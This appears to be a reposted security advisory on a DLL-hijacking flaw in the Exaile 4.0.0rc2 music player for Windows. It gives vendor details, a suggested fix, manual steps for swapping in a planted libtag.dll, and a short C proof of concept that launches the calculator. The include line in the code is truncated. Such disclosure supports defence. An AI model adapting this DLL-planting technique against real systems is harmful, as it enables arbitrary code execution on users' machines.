Exaile 4.0.0rc2 – Insecure DLL/Remote Code Execution

A local Insecure DLL has been discovered in the official Exaile v4.0.0rc2 software. The Exaile software does not verify the validation of the certificate in the named file « libtag.dll » which allows the execution of the arbitrary code.

Vulnerable Software:
[+] Exaile

Vulnerable version(s):
[+] 4.0.0rc2

Affected Libraries:
[+] libtag.dll

Product & Service Introduction:
===============================

Exaile is a music player with a simple interface and powerful music management features.
Features include automatic album art retrieval, lyrics retrieval, Internet radio broadcasting, tabbed playlists, smart playlists with extensive filtering / search functions, and more.

(Copy of the Vendor Homepage: https://www.exaile.org/)

Date of Discovery:
==================

2018-09-24

Exploitation Technique:
=======================

Local & Remote

Platfom Tested:
===============

Windows 7 & 10

Solution – Fix & Patch:
=======================

Verify the validation of the certificate in libtag.dll before loading it. If the certificate is missing or invalid, it will simply not be loaded and Exaile will not be able to execute. Verifying the DLL certificate makes hacking more difficult.

Levels Risk :

Proof of Concept (PoC):
=======================

For a demonstration of security or to replicate the execution of the arbitrary code, follow the information provided and the steps below to continue.

Manual steps to reproduce the local vulnerability ...
1. Compile dll
2. Rename the dynamic link library to libtag.dll
3. Go to the "C:\Program Files\Exaile" folder and look for the DLL named "libtag.dll"
4. Rename the original DLL "libtag.dll" to "libtag1.dll"
5. Place your malicious DLL in the "C:\Program Files\Exaile" directory and rename it to "libtag.dll"
6. Launch exaile.exe
7. Now the calculator executes!


-- PoC Exploit --
#include 
#define DLLIMPORT __declspec (dllexport)
 
DLLIMPORT void HrCreateConverter() { evil(); }
 
int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

References:
===========

[#] cxsecurity.com

Soyez le premier à commenter

Poster un Commentaire

Votre adresse de messagerie ne sera pas publiée.


*